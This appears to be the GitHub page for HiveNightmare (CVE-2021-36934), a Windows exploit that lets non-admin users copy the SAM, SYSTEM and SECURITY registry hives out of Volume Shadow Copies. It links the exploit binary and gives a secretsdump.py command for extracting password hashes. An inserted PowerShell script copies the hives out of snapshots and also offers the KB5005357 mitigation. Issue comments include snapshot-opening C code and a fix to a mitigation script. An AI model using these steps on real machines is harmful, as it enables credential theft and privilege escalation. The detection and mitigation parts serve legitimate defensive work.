Exploit allowing you to read registry hives as non-admin on Windows 10 and 11

HiveNightmare

aka SeriousSam, now tracked as CVE-2021-36934. Exploit allowing you to read the registry hives (SAM, SYSTEM, SECURITY) as a non-admin user.

What is this?

A zero-day exploit for HiveNightmare, which allows a non-administrator user to retrieve the registry hives on Windows 10. This includes the password hashes in SAM, which can be used to execute code as SYSTEM.

Download

This is the direct download link for most recent version: https://github.com/GossiTheDog/HiveNightmare/raw/master/Release/HiveNightmare.exe

Authors

  • Discovered by @jonasLyk.
  • PoC by @GossiTheDog, powered by Porgs.
  • Additions by @0xblacklight, @DHerls, @HynekPetrak

Scope

Works on all supported versions of Windows 10 where System Protection is enabled (it is enabled by default in most configurations, so at least one Volume Shadow Copy normally exists).

How does this work?

The permissions on the key registry hive files (%windir%\System32\config\SAM, SYSTEM and SECURITY) grant all non-admin users (BUILTIN\Users) read access by default in most Windows 10 configurations. This is an error. The live files themselves are held open exclusively by the kernel, so they cannot be opened directly, but the same permissive ACLs are present on the copies inside any Volume Shadow Copy, which a standard user can read.

What does the exploit do?

Allows you to read the (sensitive) SAM data on Windows 10, as well as the SYSTEM and SECURITY hives.

This exploit uses Volume Shadow Copies (VSC) to extract the SAM, SYSTEM and SECURITY hives even while they are in use, and saves them in the current directory as HIVENAME-haxx, for use with whatever cracking or secrets-dumping tools you want.
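The check below is an added example and is not HiveNightmare's code nor its Mitigation.ps1. It reproduces the two conditions the text describes from a defender's side: a BUILTIN\Users read ACE on the live hive files, and a readable copy of those hives inside a shadow copy reachable through the \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN device path. Assumptions: shadow copies are probed by index 1..$MaxShadow (the same hardcoded depth the PoC uses, because vssadmin list shadows needs admin rights), cmd.exe's copy is used to open the device path, copies land under %TEMP%\hivecheck, and the optional -Fix switch applies the mitigation Microsoft documents in KB5005357 (re-enable ACL inheritance on the config directory, then delete the shadow copies that still carry the old copies). The -Fix path must run elevated.

```powershell
# Added example, not part of the HiveNightmare project.
# Assumptions: shadow copies are probed by index (HarddiskVolumeShadowCopy1..N), cmd.exe copy
# handles the \\?\GLOBALROOT device path, and -Fix applies the KB5005357 mitigation (elevated).
param(
    [int]$MaxShadow = 4,   # same search depth the PoC hardcodes
    [switch]$Fix           # restore ACL inheritance and purge shadow copies (run elevated)
)

$hives  = 'SAM', 'SYSTEM', 'SECURITY'
$config = Join-Path $env:windir 'System32\config'
$outDir = Join-Path $env:TEMP 'hivecheck'   # copied hives are sensitive: delete this directory afterwards
New-Item -ItemType Directory -Force -Path $outDir | Out-Null

# 1. Root cause: an Allow ACE granting BUILTIN\Users read access on the live hive files.
#    After the fix a standard user cannot even read the ACL, which is the expected state.
$badAcl = foreach ($h in $hives) {
    $acl = Get-Acl -Path (Join-Path $config $h) -ErrorAction SilentlyContinue
    if (-not $acl) { continue }
    $ace = $acl.Access | Where-Object {
        $_.IdentityReference.Value -eq 'BUILTIN\Users' -and
        $_.AccessControlType -eq 'Allow' -and
        ($_.FileSystemRights -band [System.Security.AccessControl.FileSystemRights]::ReadData)
    }
    if ($ace) { $h }
}
if ($badAcl) { Write-Host "Users can read live hive ACLs: $($badAcl -join ', ')" }
else         { Write-Host "Live hive ACLs look fixed (no BUILTIN\Users read ACE)" }

# 2. The live files are locked by the kernel, so the PoC reads the copies inside a snapshot.
#    A successful copy out of a snapshot as a standard user is the exploitable condition.
$exposed = @()
for ($i = 1; $i -le $MaxShadow; $i++) {
    foreach ($h in $hives) {
        $src = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$i\Windows\System32\config\$h"
        $dst = Join-Path $outDir "$h-shadow$i"
        cmd.exe /c copy /y "$src" "$dst" 2>$null 1>$null
        if ($LASTEXITCODE -eq 0) { $exposed += "$h (shadow copy $i)" }
    }
}
if ($exposed) { Write-Host "VULNERABLE: readable hives in snapshots: $($exposed -join '; ')" }
else          { Write-Host "No readable hive found in shadow copies 1..$MaxShadow" }

# 3. Mitigation (KB5005357): restrict the ACLs, then delete the snapshots that still
#    contain the permissive copies. Fixing only the ACL leaves old snapshots exploitable.
if ($Fix) {
    icacls (Join-Path $config '*.*') /inheritance:e | Out-Null
    vssadmin delete shadows "/for=$env:SystemDrive" /Quiet | Out-Null
    $left = @(Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue).Count
    Write-Host "ACL inheritance re-enabled; shadow copies remaining: $left"
}
```

Run it unelevated first: if step 2 reports a hive, any local user can feed the copy in %TEMP%\hivecheck straight to secretsdump.py. Run it again after -Fix (and after creating a fresh restore point, if you rely on System Protection) to confirm that both the ACL and the snapshot condition are gone.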

Pulling Credentials out

python3 secretsdump.py -sam SAM-haxx -system SYSTEM-haxx -security SECURITY-haxx LOCAL

More info?

I wrote a blog: https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5


Video of exploit: https://www.youtube.com/watch?v=5zdIq6t3DOw

Comments
  • Getting error

    Getting error "Could not open SAM" on Windows 10.0.19043.1055

    To start, I know this 'exploit' (for lack of a better term) is very new and still being explored. I'm not expecting anyone to solve my issues, but wanted to get information out there in case others are running into the same issue and if any of us (myself included) can solve it, it may help others.

    When running this I'm getting an error that it could not open the SAM:

    C:\Users\User1\Downloads\HiveNightmare-master\HiveNightmare-master\Release>.\HiveNightmare.exe
    Could not open SAM :( Is System Protection not enabled or vulnerability fixed?  Note currently hardcoded to look for first 4 VSS snapshots only - list snapshots with vssadmin list shadows
    C:\Users\User1\Downloads\HiveNightmare-master\HiveNightmare-master\Release>
    

    Currently running Windows [Version 10.0.19043.1055] and can see that users have read permissions for the SAM database. This is a domain-joined computer in my lab with no other changes made. The image is the latest VM for developers.

    C:\Windows\system32>icacls c:\Windows\system32\config\SAM
    c:\Windows\system32\config\SAM BUILTIN\Administrators:(I)(F)
                                   NT AUTHORITY\SYSTEM:(I)(F)
                                   BUILTIN\Users:(I)(RX)
                                   APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                   APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
    
    Successfully processed 1 files; Failed processing 0 files
    
    C:\Windows\system32>
    

    I did try the command suggested in the error and it looks like it can't find any shadow copies.

    C:\Users\User1\Downloads\HiveNightmare-master\HiveNightmare-master\Release>vssadmin list shadows
    vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
    (C) Copyright 2001-2013 Microsoft Corp.
    
    No items found that satisfy the query.
    
    C:\Users\User1\Downloads\HiveNightmare-master\HiveNightmare-master\Release>
    

    On my non-domain-joined hosts it does not show that the users can read the SAM database, so I'm not sure if this requires domain joining or if it's just me.

    If I find a solution, I'll update this. If anyone else has any thoughts/ideas I would welcome them.

  • Handle leak during search for youngest file

    This loop over the snapshots opens each one to get its filetime to find the earliest one. The handle to the youngest file is returned. However, the loop never calls CloseHandle on the files it passes by. These will be closed at main exit, but it is still correct to dispose of them properly.

        for (int i = 1; i <= maxSearch; i++) {
            wchar_t fullPath[MAX_PATH];
            swprintf_s(fullPath, MAX_PATH, L"%s%d\\%s", base, i, path);
    
            hfile = CreateFile(fullPath, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
            if (hfile != INVALID_HANDLE_VALUE) {
                if (GetFileTime(hfile, &creationTime, &lastAccessTime, &lastWriteTime)) {
                    if (CompareFileTime(&youngest, &lastWriteTime) < 0) {
                        retHandle = hfile;
                        youngest = lastWriteTime;
                        wcout << "Newer file found: " << fullPath << endl;
                    }
    +                else {
    +                   CloseHandle(hfile);
    +                }
                }
            }
        }
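Review bot: the added `else` branch only closes handles that lose the comparison, so two leaks remain in this hunk. First, when a newer file is found, `retHandle = hfile;` overwrites the previous winner without closing it, leaking one handle per "Newer file found" message; close the superseded handle right before that assignment, e.g. `if (retHandle != INVALID_HANDLE_VALUE) CloseHandle(retHandle);` (this assumes `retHandle` starts as INVALID_HANDLE_VALUE, which is not visible in the snippet). Second, when `GetFileTime` fails the `if` body is skipped and `hfile` is never closed; moving the `CloseHandle(hfile)` out to an `else` on the `GetFileTime` check, or tracking a `keep` flag and closing after the block, covers both paths.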
    

    https://github.com/GossiTheDog/HiveNightmare/blob/042805345e071cb3aa7bf6d8a9dc6a4f7c147269/HiveNightmare/HiveNightmare.cpp#L33

  • Add SYSTEM and SECURITY hives

    Messy copy-pasting to add reading the SYSTEM and SECURITY hives and writing them out to disk, as well as instructions in the README on how to use secretsdump.py to crack them.

  • Take latest shadow copy & handle unicode output

    Hi, this pull request comprises:

    1. Always extract the newest shadow copy, usually the one with the highest ID.

    2. Adjusted Unicode output to the console (_setmode & wcout), although not required. I needed it while printing out a date formatted in the current locale (Czech) to the console.

  • $checkShadow is $null when no shadow copies exist

    On at least Windows 10 20H2 (19042.1110), Get-WmiObject Win32_ShadowStorage returns $null when shadow copies are not configured and none exist.

    This led to $fixed = $false, when in fact the issue is fixed.

    Recommend updating to the following:

    #check shadow
    if ($vulnerable -eq $true) {
        $checkShadow = Get-WmiObject Win32_ShadowStorage -Property UsedSpace | Select-Object -ExpandProperty UsedSpace
        if ((0 -eq $checkShadow) -or ($null -eq $checkShadow)) {
            $shadowSucces = $true
            Write-Host "Successfully deleted old volume shadow copies."
        }
        else {
            $shadowSucces = $false
            write-host "Shadow deletion failed. Security software may be blocking this action or check running permissions."
        }
    }
    

    https://github.com/GossiTheDog/HiveNightmare/blob/042805345e071cb3aa7bf6d8a9dc6a4f7c147269/Mitigation.ps1#L40
